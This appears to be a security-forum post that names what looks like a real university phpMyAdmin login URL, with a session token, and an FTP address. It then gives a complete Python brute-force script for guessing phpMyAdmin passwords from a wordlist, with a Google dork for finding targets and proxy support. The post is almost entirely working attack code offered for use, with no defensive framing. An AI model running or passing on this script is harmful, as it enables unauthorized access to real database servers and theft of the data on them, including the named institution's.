Cyber Security Forum (X-code) - PT. Teknologi Server Indonesia

Code: Select all

ftp://124.81.255.180/pub/

Code: Select all

http://digilib.its.ac.id/phpmyadmin/index.php?lang=en-utf-8&convcharset=iso-8859-1&collation_connection=utf8_unicode_ci&token=ba00a412b29d11e517c0287da6224509

Code: Select all

#!/usr/bin/python
#PhpMyAdmin Brute Force (index.php)

#Dork: intitle:phpmyadmin

#Code 99% ripped from d3hydr8's Wordpress BF
#Added cookie support

import urllib2, sys, re, urllib, httplib, socket, cookielib

# Python includes a function to fetch urls in urllib2, but it can't
# store cookies. We instead are going to make our own function to
# replace the normal urlopen().

# Cookie jar creation. This will store cookies. Jenius.
cookie_jar = cookielib.CookieJar()

print "\n   inkubus[at]darkc0de[dot]com PhpMyAdminBF v1.0"
print "----------------------------------------------"

if len(sys.argv) not in [4,5,6,7]:
        print "Usage: ./pmabf.py <site> <user> <wordlist> <options>\n"
        print "\t   -p/-proxy <host:port> : Add proxy support"
        print "\t   -v/-verbose : Verbose Mode\n"
        sys.exit(1)

for arg in sys.argv[1:]:
        if arg.lower() == "-p" or arg.lower() == "-proxy":
              proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
        if arg.lower() == "-v" or arg.lower() == "-verbose":
              verbose = 1

try:
        if proxy:
              print "\n[+] Testing Proxy..."
              h2 = httplib.HTTPConnection(proxy)
              h2.connect()
              print "[+] Proxy:",proxy
except(socket.timeout):
        print "\n[-] Proxy Timed Out"
        proxy = 0
        pass
except(NameError):
        print "\n[-] Proxy Not Given"
        proxy = 0
        pass
except:
        print "\n[-] Proxy Failed"
        proxy = 0
        pass

try:
        if verbose == 1:
              print "[+] Verbose Mode On\n"
except(NameError):
        print "[-] Verbose Mode Off\n"
        verbose = 0
        pass

if sys.argv[1][:7] != "http://":
        host = "http://"+sys.argv[1]
else:
        host = sys.argv[1]

print "[+] BruteForcing:",host
print "[+] User:",sys.argv[2]

try:
        words = open(sys.argv[3], "r").readlines()
        print "[+] Words Loaded:",len(words),"\n"
except(IOError):
        print "[-] Error: Check your wordlist path\n"
        sys.exit(1)

for word in words:
        word = word.replace("\r","").replace("\n","")
        login_form_seq = [
        ('pma_username', sys.argv[2]),
        ('pma_password', word),
        ('server', '1'),
        ('submit', 'Go'),
        ('lang', 'en-utf-8'),
        ('convcharset', 'iso-8859-1')]
        login_form_data = urllib.urlencode(login_form_seq)
        if proxy != 0:
              proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
              opener = urllib2.build_opener(proxy_handler)
        else:
              opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cookie_jar))
        try:
              site = opener.open(host, login_form_data).read()
        except(urllib2.URLError), msg:
              print msg
              site = ""
              pass

        if re.search("Cookies must be enabled past this point",site):
              print "[-] Failed: PhpMyAdmin has cookies enabled\n"
              sys.exit(1)

        #Change this response if different. (language)
        #if re.search("<h1>Error</h1>",site) and verbose == 1:  <- fails this way without -v
        if re.search("<h1>Error</h1>",site) or re.search("Access denied",site):
              print "[-] Login Failed:",word
        else:
              print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
              sys.exit(1)
print "\n[-] Brute Complete\n"